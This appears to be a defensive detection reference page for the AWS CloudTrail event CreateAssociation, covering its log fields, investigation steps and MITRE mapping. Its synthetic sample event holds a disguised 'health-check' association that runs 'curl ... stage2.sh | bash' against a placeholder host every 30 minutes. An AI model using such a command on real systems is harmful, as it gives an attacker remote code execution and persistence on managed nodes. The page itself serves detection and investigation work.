CreateAssociation
CreateAssociation
Event
Associates an SSM document with selected managed nodes and optional scheduling. Associations ordinarily run upon creation; applyOnlyAtCronInterval changes supported cron behavior and is not supported with rate expressions. Target tags can include additional matching nodes over time, subject to management prerequisites.
Security Context
Unauthorized associations can schedule repeated execution (T1053/T1651). Approved configuration management is common. Creation does not guarantee execution on every matching host or persistence across arbitrary redeployment.
Log Source
CloudTrail management event with eventSource: ssm.amazonaws.com and eventName: CreateAssociation. Inspect errorCode/errorMessage and follow-up state. A missing or null response body does not alone establish success or failure.
Key Fields
Fields below refer to requestParameters unless otherwise noted. Exact CloudTrail serialization should be checked against the original record.
| Field | Investigation value |
|---|---|
name, documentVersion, parameters | Document version and requested inputs. |
targets, scheduleExpression | Target selection and recurrence. |
userIdentity, eventTime, awsRegion, eventID (top level) | Caller/session, timeline, Region, and correlation identifiers. |
What to Investigate
- Confirm the recorded outcome and compare caller, target, and timing with the approved workflow.
- Resolve the document and actual tag-matched nodes, including later target changes.
- Check SSM Agent availability, node permissions, platform compatibility, and connectivity.
- Review association execution history and per-node results. Pending/Creating is not completed command execution.
Sample Event
Synthetic scenario. A rate-based association submits a shell command to tag-selected nodes. The TEST-NET destination is illustrative; the response only shows pending association setup.
Exact CloudTrail field presence, response nesting, redaction, and timestamp formatting remain unverified against captured logs. Illustrative names do not establish intent or downstream behavior.
{ "eventVersion": "1.09", "userIdentity": { "type": "IAMUser", "principalId": "AIDADRAC0MALF0YBADGY", "arn": "arn:aws:iam::555123456789:user/draco", "accountId": "555123456789", "accessKeyId": "ASIADRAC0MALF0YEXAMP5", "userName": "draco", "sessionContext": { "attributes": { "creationDate": "2026-04-15T18:51:02Z", "mfaAuthenticated": "false" } } }, "eventTime": "2026-04-15T21:48:33Z", "eventSource": "ssm.amazonaws.com", "eventName": "CreateAssociation", "awsRegion": "us-east-1", "sourceIPAddress": "203.0.113.66", "userAgent": "aws-cli/1.18.147 Python/3.7.10 Linux/5.4.0-1045-aws botocore/1.18.6", "requestParameters": { "name": "AWS-RunShellScript", "associationName": "occamy-health-check", "targets": [ { "key": "tag:fantasticlogs/component", "values": [ "occamy-pipeline" ] } ], "parameters": { "commands": [ "curl -fsSL http://203.0.113.77/stage2.sh | bash" ], "executionTimeout": [ "3600" ] }, "scheduleExpression": "rate(30 minutes)" }, "responseElements": { "associationDescription": { "associationId": "66666666-6666-6666-6666-001010011010", "associationVersion": "1", "name": "AWS-RunShellScript", "associationName": "occamy-health-check", "documentVersion": "$DEFAULT", "date": "Apr 15, 2026, 9:48:33 PM", "lastUpdateAssociationDate": "Apr 15, 2026, 9:48:33 PM", "scheduleExpression": "rate(30 minutes)", "targets": [ { "key": "tag:fantasticlogs/component", "values": [ "occamy-pipeline" ] } ], "overview": { "detailedStatus": "Creating", "status": "Pending" }, "status": { "name": "Associated", "date": "Apr 15, 2026, 9:48:33 PM", "message": "Associated with AWS-RunShellScript" } } }, "requestID": "90000000-0000-4000-8000-000010000000", "eventID": "90000000-0000-4000-8000-000010000001", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "555123456789", "eventCategory": "Management", "tlsDetails": { "tlsVersion": "TLSv1.3", "cipherSuite": "TLS_AES_128_GCM_SHA256", "clientProvidedHostHeader": "ssm.us-east-1.amazonaws.com" }}Sources
MITRE ATT&CK Mapping
Tactics: Persistence Execution
- T1053 — Scheduled Task/Job — Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, prov...
- T1651 — Cloud Administration Command — Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents.